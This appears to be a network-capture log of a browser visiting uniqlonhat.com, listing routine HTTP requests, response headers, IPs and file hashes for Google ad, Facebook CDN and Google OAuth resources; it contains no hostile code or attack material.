GET /pagead/ads?client=ca-pub-7004947269569512&output=html&h=600&slotname=6743384521&adk=1598921218&adf=3812454198&pi=t.ma~as.6743384521&w=203&fwrn=4&fwrnh=100&lmt=1670079870&rafmt=1&format=203x600&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1670079870087&bpp=3&bdt=2820&idt=412&shv=r20221110&mjsv=m202211150101&ptt=9&saldr=aa&abxe=1&correlator=5967442002333&frm=20&pv=2&ga_vid=1519869217.1670079870&ga_sid=1670079871&ga_hid=275869444&ga_fc=1&u_tz=0&u_his=1&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_sd=1&adx=901&ady=1746&biw=1268&bih=939&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759837%2C42531706%2C31071035%2C44770881%2C44774292%2C31070950&oid=2&pvsid=1622766787500943&tmod=1938675097&nvt=1&eae=0&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C1024%2C1280%2C939&vis=1&rsz=%7Cm%7CpeEbr%7Cp&abl=XS&pfx=0&fu=128&bc=23&ifi=1&uci=a!1&btvi=1&fsb=1&xpc=QI8RjYK0VJ&p=http%3A//uniqlonhat.com&dtd=545 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: br
date: Sat, 03 Dec 2022 15:04:33 GMT
server: cafe
content-length: 207
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Sat, 03-Dec-2022 15:19:32 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Sat, 03 Dec 2022 15:04:33 GMT
cache-control: private
X-Firefox-Spdy: h2
pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20221110&st=env
142.250.74.130200 OK 11 kB URL HTTP/2 pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20221110&st=env
IP 142.250.74.130:0
File type JSON data\012- , ASCII text, with very long lines (14842), with no line terminators
Hash c785e1e526fe005dfac3bdfc744cfd93
0251cbb63bcaed7024aec9c312777ef3f63b193b
da3e43e78aa4042dada680421e321f5e38b239098946bf939c9ca416be928a81
GET /getconfig/sodar?sv=200&tid=gda&tv=r20221110&st=env HTTP/1.1
Host: pagead2.googlesyndication.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
content-type: application/json; charset=UTF-8
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: br
date: Sat, 03 Dec 2022 15:04:34 GMT
server: cafe
content-length: 11203
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 471 B IP 142.250.74.131:0
Hash bb045ee4346b85d699158fdba8f84f64
ee5cf0d75cd678dc71c6083cc7ce68169c0fce2d
8b2dcab1627a9c21b66cd6ea676dd5b4b6a39bebf2cfafcc21f52b5221bb6a03
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:34 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
static.xx.fbcdn.net/rsrc.php/v3/y3/l/0,cross/-MfsHH0joer.css?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 5.0 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/y3/l/0,cross/-MfsHH0joer.css?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (4431)
Hash 34c7c8ac5c5afe2194fe0015729a6362
99ba29737187829926793d1030f71a1e024b6bd6
dd49cedd11b308a50b6c1803cee732e2de5db081df13e12c24418a8c15d06869
GET /rsrc.php/v3/y3/l/0,cross/-MfsHH0joer.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: text/css; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 02 Dec 2023 18:30:25 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: NMfIrFxa/iGU/gAVcppjYg==
x-fb-debug: nJdjrT6GcTSdZGqsOFOUuUoQAvYNBMmIusNVTSl0uqyuFaItmTGiEQfFgrHAaNXtCy9ltc8MS4r9wBgN5Yk7HA==
content-length: 5034
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
tpc.googlesyndication.com/sodar/sodar2.js
172.217.21.161200 OK 6.4 kB URL HTTP/2 tpc.googlesyndication.com/sodar/sodar2.js
IP 172.217.21.161:0
File type ASCII text, with very long lines (1321)
Hash ac906814ed812c4ecdbb624a3bd2f6c3
8e4547eaffaa66a1ee61b36028dbcd7091d0e7de
8ab8cef6156022c4547455defd8252b48b6bcb8b734072849345bb99758705fe
GET /sodar/sodar2.js HTTP/1.1
Host: tpc.googlesyndication.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: text/javascript
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="adspam-signals-scs"
report-to: {"group":"adspam-signals-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/adspam-signals-scs"}]}
content-length: 6386
date: Sat, 03 Dec 2022 15:04:34 GMT
expires: Sat, 03 Dec 2022 15:04:34 GMT
cache-control: private, max-age=3000
etag: "1637097310169751"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3iEpO4/y_/l/en_US/PrAyCCXaG8Y.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 23 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3iEpO4/y_/l/en_US/PrAyCCXaG8Y.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (42048)
Hash a49a6a325c83315e48005a93795e59ce
09109915e1cd9771cc0db541cf7db98a859cd2a8
162e68e63e47128e3b650e09da14daa8e38ab030c7836eda1f0cb239c43af2c0
GET /rsrc.php/v3iEpO4/y_/l/en_US/PrAyCCXaG8Y.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 02 Dec 2023 22:37:10 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: pJpqMlyDMV5IAFqTeV5Zzg==
x-fb-debug: kKKEup+IqTIUuM8jg6RFaIS2AHfnoavv9vqmIVmqSJU0vcG3LpBSQlDy0aTwGSVuoWJ2V2e6oqO7mLGwJqm/+w==
priority: u=3,i
content-length: 23367
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/-HGPTKcj37t.css?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 830 B URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/-HGPTKcj37t.css?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (724)
Hash d63a02ce87c07ffcfa869fef7fc5f233
cae745fef84088abe3525bb77f75c55cd1d4cc2c
bf9d4d71541a0a1f31b10be351add847ee935da6de355756314c8ca96512444d
GET /rsrc.php/v3/yn/l/0,cross/-HGPTKcj37t.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: text/css; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Dec 2023 15:32:35 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 1joCzofAf/z6hp/vf8XyMw==
x-fb-debug: KXJN8lrki5yL3gkzZNmlm2Aa72min4K4juqQH540tx20GYGPkG5FzIsAbBTGj2R4nS974BGprxYpblGqaixX1g==
priority: u=3,i
content-length: 830
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yy/r/BBmdPZ5Lu1y.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 84 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yy/r/BBmdPZ5Lu1y.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (18622)
Hash 7e02e853954d5bcd6ef6e835f9277c0e
54dd84211b7e069b15a63bc3613b36c1cf3ce8d0
e726e6c78b6e5583b726562388aabf3852d26fc110129a2d8f95f7d9c4b7ac46
GET /rsrc.php/v3/yy/r/BBmdPZ5Lu1y.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Dec 2023 23:20:50 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: fgLoU5VNW81u9ug1+Sd8Dg==
x-fb-debug: atLs79tPF77P2XY3Mz1yly8J/D2P92FlEV8Zw+snrySq4jFcPnTJSs/sEAqayn2r10qlhx3aihf+4FSQN58HOg==
priority: u=2
content-length: 84306
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yH/r/att8vh4fKZW.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 1.8 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yH/r/att8vh4fKZW.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (1984)
Hash 3eec5e9a11ba7da3a0f8cd0af8b4bdcb
462922ace2e24121fb02f42966abb8004b24c98c
92e829ebf854a5a759b0f718ea0f31b4870e1dbbd7f09e8c2e1cac0b21e6d69c
GET /rsrc.php/v3/yH/r/att8vh4fKZW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 30 Nov 2023 17:47:11 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: PuxemhG6faOg+M0K+LS9yw==
x-fb-debug: NBMcg3HhaeYN36UeWhUniQQftYkPs9SBDvWKRZCaTKNc4rGO54UzpthVZTDcKygnlKRpJ/Slfvgqq8RVLetIGA==
priority: u=1,i
content-length: 1847
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 12 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (5542)
Hash 1ad15afc034f310427c81b0759603a2b
e5efd1d029dccf5fa8128c84aadb6544a4ab60e0
fedf63f655f9eef24c517c3d6762fb07b142213ba623d4a0b06614fb5d9754bd
GET /rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 29 Nov 2023 02:03:08 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: GtFa/ANPMQQnyBsHWWA6Kw==
x-fb-debug: K/LG0G/rN8AmXME8G97+IpdWa6lexO4XOwiyY6pHen86Q4vVh7zoj6gFWvMpmxxIpEy7IEqceELZzc0dk1ptmA==
content-length: 12334
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yR/r/bPhRbIw5d4Y.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 16 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yR/r/bPhRbIw5d4Y.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type C source, ASCII text, with very long lines (8741)
Hash c92ef94e30a2dd9473fd9fe533472b73
97049e47de026939c75a885df9e8bb0fb56515ba
f2981c7109e60cf9f5a9e846a25800dbec20a923db028f310b6feb79415650bb
GET /rsrc.php/v3/yR/r/bPhRbIw5d4Y.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Dec 2023 16:05:39 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: yS75TjCi3ZRz/Z/lM0crcw==
x-fb-debug: wDsTlr8aZiOvVvXv/fhvZPJj0kaU7nWKo2BrLLKLGWDuUT2i+dju7G+ZqG/pXOk6JXxZwN+15wFpLBRmrMErxg==
content-length: 16232
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yw/r/UXtr_j2Fwe-.png
31.13.72.12200 OK 573 B URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yw/r/UXtr_j2Fwe-.png
IP 31.13.72.12:0
File type PNG image data, 13 x 39, 8-bit colormap, non-interlaced\012- data
Hash d3b686ff6004b431d5019e4b51a8cc0d
34ec288bdcad2eada81c75960439bf60b95eb285
96e3e8dfde6b1042514824bac1b44282d4a76bac028f2d767f6534dce2cf3db0
GET /rsrc.php/v3/yw/r/UXtr_j2Fwe-.png HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://static.xx.fbcdn.net/rsrc.php/v3/y3/l/0,cross/-MfsHH0joer.css?_nc_x=Ij3Wp8lg5Kz
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
content-type: image/png
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: 07aG/2AEtDHVAZ5LUajMDQ==
expires: Wed, 29 Nov 2023 02:36:29 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
x-fb-debug: KOuKppL33c02M1Y0MFQKhsHwNA+m4fKy0OcSO/I1W4KfMPC9JtzzBtZtMKyRL3YeKkUropEgrZKbbf62kbcFYQ==
priority: u=3,i
content-length: 573
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yX/r/JYOpIVwZVr3.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 7.2 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yX/r/JYOpIVwZVr3.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (4057)
Hash 72ce84f8c50139151a20bf5471e26955
ddb1cf4f30d5935149c5eb1cd2ab799002bd9c73
abee72daf709c744bfa59f68193be9899d5a80eb72874965dfa3ec373c861973
GET /rsrc.php/v3/yX/r/JYOpIVwZVr3.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 29 Nov 2023 19:00:41 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: cs6E+MUBORUaIL9UceJpVQ==
x-fb-debug: mx2jZo1rWki9ij4/YXmVJc85Cpe+pyppCQcW1gfgTZO1JWJ8RECeXp/VT7O5OloYfPMFXo2MZ56l8xyH4QErPQ==
content-length: 7183
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:34 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
connect.facebook.net/signals/config/729240603851497?v=2.9.89&r=stable
31.13.72.12200 OK 0 B URL HTTP/2 connect.facebook.net/signals/config/729240603851497?v=2.9.89&r=stable
IP 31.13.72.12:0
GET /signals/config/729240603851497?v=2.9.89&r=stable HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-type: application/x-javascript; charset=utf-8
content-security-policy: default-src facebook.net *.facebook.net fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com data: blob: 'self';script-src *.fbcdn.net *.facebook.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.net *.facebook.net fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com;connect-src *.fbcdn.net *.facebook.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: public
cache-control: public, max-age=1200
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
x-fb-debug: 4w6xjx8MhnbqGr9erfvgk73O7wAkntlz7mhe/08jWVHOT8+iwbDxqYzmRlMFdGuD9Ja2DUDvQeTaYroeeOJwSg==
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:32 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Funiqlonhat.com&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.geaHZXF2-fw.O%2Fd%3D1%2Frs%3DAHpOoo9yYF5eCIYPx4UH9gpJptM2Q_GGxQ%2Fm%3D__features__
216.58.211.13200 OK 0 B URL HTTP/2 accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Funiqlonhat.com&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.geaHZXF2-fw.O%2Fd%3D1%2Frs%3DAHpOoo9yYF5eCIYPx4UH9gpJptM2Q_GGxQ%2Fm%3D__features__
IP 216.58.211.13:0
GET /o/oauth2/postmessageRelay?parent=http%3A%2F%2Funiqlonhat.com&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.geaHZXF2-fw.O%2Fd%3D1%2Frs%3DAHpOoo9yYF5eCIYPx4UH9gpJptM2Q_GGxQ%2Fm%3D__features__ HTTP/1.1
Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Dec 2022 15:04:32 GMT
content-security-policy: script-src 'nonce-DH5zEQD1LgOxtCnm_PMcog' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /o/cspreport, require-trusted-types-for 'script';report-uri /o/cspreport
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2